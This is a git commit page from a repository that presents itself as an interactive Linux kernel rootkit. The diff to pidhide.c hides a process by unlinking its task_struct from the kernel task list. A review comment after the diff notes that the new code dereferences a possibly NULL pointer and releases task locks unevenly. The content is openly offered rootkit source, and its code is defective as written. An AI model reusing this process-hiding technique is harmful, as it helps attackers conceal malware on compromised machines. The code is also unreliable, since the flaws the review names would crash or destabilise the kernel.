linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit f4cd99af97f6b2f248eea00bc37cf65cba714c5d
parent ad0cdde58b84a05277161a2d07019f268f9f5769
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 25 Jan 2021 02:38:12 +0100

testing

Diffstat:
Mrootkit/src/pidhide.c | 18+++++++++++++++---
1 file changed, 15 insertions(+), 3 deletions(-)

diff --git a/rootkit/src/pidhide.c b/rootkit/src/pidhide.c
@@ -67,10 +67,22 @@ hide_pid(pid_t pid)
 add_pid_to_list(hidden_pids_tail, pid);
 task_struct *ts = find_task_by_vid(pid);
- if (ts) {
- DEBUG_INFO("found\n");
- list_del(&ts->tasks);
+ struct task_struct *task;
+
+ rcu_read_lock();
+ for_each_process(task) {
+ task_lock(task);
+ if(ts == task) {
+ task_unlock(task);
+ continue;
+ }
+ task_unlock(task);
+ }
+ list_del(&ts->tasks);
+ for_each_process(task) {
+ task_unlock(task);
 }
+ rcu_read_unlock();
 }
 void
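Review bot: `list_del(&ts->tasks)` now runs without the `if (ts)` guard that this hunk removes, so a PID that `find_task_by_vid()` cannot resolve becomes a NULL dereference in kernel context. The second `for_each_process` loop also calls `task_unlock(task)` on every task although the first loop has already released each lock it took, so the unlocks are unbalanced. Both defects leave the host kernel in an inconsistent state instead of failing cleanly, and an analyst would likely see the result as an oops or a lock-debugging warning. Until the code is reworked it should at least carry a comment such as `/* testing only: ts is unchecked and the unlock loop below is unbalanced */`, since the commit message "testing" does not say what is being tried. The body of hide_pid starts above the hunk, so earlier validation of `pid` cannot be judged from here.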